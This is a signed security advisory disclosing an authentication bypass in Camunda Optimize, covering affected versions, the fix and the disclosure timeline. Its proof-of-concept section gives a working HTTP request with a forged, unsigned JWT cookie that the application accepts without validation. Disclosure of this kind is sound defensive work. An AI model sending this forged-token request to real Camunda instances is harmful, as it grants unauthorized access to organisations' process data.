-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2025-038 
Product:                   Camunda Optimize
Manufacturer:              Camunda Services GmbH 
Affected Version(s):       <= 8.6.9 or <= 8.7.2 
Tested Version(s):         8.6.1
Vulnerability Type:        Improper Authentication (CWE-287) 
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2025-05-28
Solution Date:             2025-06-17
Public Disclosure:         2025-07-17
CVE Reference:             Not yet assigned
Author of Advisory:        Nicola Staller, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Camunda Optimize enables process evaluation as a part of the Camunda platform.
The manufacturer describes the product as follows (see [1]):

"Camunda Optimize enables a strategic conversation and collaboration between
business and IT, centered around processes that align with company goals and
objectives. Show the reality of what’s working in your process—and what needs
improvement—using expressive dashboards created with your process data."

Due to improper authentication, Camunda Optimize is vulnerable to a complete
authentication bypass.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Camunda Optimize relies on JSON Web Tokens (JWTs) transmitted as a cookie for
authentication. Since the JWT is not properly validated, the application and
its data is accessible without a valid user account.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Issue a request with a JWT such as {}.{"sub":"test"}.

GET /api/process/overview? HTTP/2
Host: <HOST>
Cookie: X-Optimize-Authorization=e30.eyJzdWIiOiJ0ZXN0In0=.
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
X-Optimize-Client-Timezone: Europe/Berlin
X-Optimize-Client-Locale: en

Observe that the application returns valid data even though no valid
authentication information was sent.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Update to Camunda Optimize 8.6.10 or 8.7.3.

More information can be found at 
https://docs.camunda.io/docs/next/reference/notices/#notice-20.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2025-05-23: Vulnerability discovered
2025-05-28: Vulnerability reported to manufacturer
2025-06-17: Patch released by manufacturer
2025-07-17: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Camunda Optimize
    https://camunda.com/platform/optimize/ 
[2] SySS Security Advisory SYSS-2025-038
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-038.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Nicola Staller of SySS
GmbH.

E-Mail: nicola.staller@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Nicola_Staller.asc
Key ID: 0x41DD2290
Key Fingerprint: A127 394A F398 B097 2332  637C 9DF3 39F9 41DD 2290 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 4.0
URL: https://creativecommons.org/licenses/by/4.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEoSc5SvOYsJcjMmN8nfM5+UHdIpAFAmh2ZCwACgkQnfM5+UHd
IpAVHRAAirK4nP1Z3irfjeygbD+F6oaS0/lYgVOkaSSGssSaaZSUeiVUzu8mSAZf
WbDxHmtmczr9+t9T99+JG7MiXk84SaXFBz1175M4tZvPsvXrKhrnQ64ClyJkgBQN
AiSX/NoW3/GK/qR1qjjeHlzn5O10HSUPzgl4oXIbFeE9e6XsW/WhLkRJR6nUZt+K
Nt7Oqaj4xy89BL57jO86BARtd9DANLJUR4b13R62W0NzQL+3RxenYeyHRxZA+6X5
ps2mHwUXzMT/w/CeHCAOkPYvQjB7frbsrPJq7PJoBD3tWSYaI7lf99TLNh9mI25m
Jwe7PdA6cwsS8Sy1WdlaPXoQLugY/9y78qilcmSTgKSPx5vpPHKw+xQNUx9cYbiq
4KQv8j14tASL49eGxwUWOKdhe6eBZM13KF3wFtHqwoIe9lHCpC+P/jKHx7ylkBYf
zuF4rcFvSXBzqBp37mtlEyjGLi/xAxOpZfsOB8/tsypvRLuhOZzYUB2bj1/keHLV
MRImycib02of+6HllNYOzwJ6wWGX1Fw2VJF+TVLD9YVUTHzNS79IPhNzfvnvonZ/
7NiQsm7yZG2RKl9RqvhIkE1h/75qyAweWDEPaRAJApx6mbws6oJ62u0JFHhS7maU
X9rbxUX4wHCtbGq9RqrJUQKiwvCfzouB7UDpnu99uOy7rVhanqI=
=Gfup
-----END PGP SIGNATURE-----